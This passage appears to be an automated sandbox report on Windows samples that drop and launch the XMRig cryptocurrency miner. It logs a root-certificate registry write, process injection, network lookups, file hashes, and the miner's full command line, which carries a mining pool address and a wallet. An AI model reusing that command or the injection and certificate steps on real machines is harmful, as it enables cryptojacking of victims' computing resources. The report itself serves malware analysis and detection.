| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3208 wrote to memory of 892 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3208 wrote to memory of 892 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.83.221.88.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.173.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/892-16-0x0000016D31650000-0x0000016D31670000-memory.dmp
memory/892-17-0x0000016DC52D0000-0x0000016DC52F0000-memory.dmp
memory/892-18-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-20-0x0000016DC5940000-0x0000016DC5960000-memory.dmp
memory/892-19-0x0000016DC5920000-0x0000016DC5940000-memory.dmp
memory/892-21-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-22-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-25-0x0000016DC5940000-0x0000016DC5960000-memory.dmp
memory/892-24-0x0000016DC5920000-0x0000016DC5940000-memory.dmp
memory/892-23-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-26-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-27-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-28-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-29-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-30-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-31-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-32-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-33-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-34-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-35-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-36-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-37-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-38-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-39-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-40-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-41-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-42-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-43-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-44-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-45-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-46-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-47-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-48-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-49-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-50-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-51-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-52-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-53-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-54-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-55-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-56-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-57-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-58-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-59-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-60-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-61-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-62-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-63-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-64-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-65-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-66-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-67-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-68-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-69-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-70-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-71-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-72-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-73-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-74-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-75-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-76-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-77-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-78-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-79-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-80-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-81-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-82-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-83-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-84-0x00007FF696010000-0x00007FF696B13000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1236 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1236 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
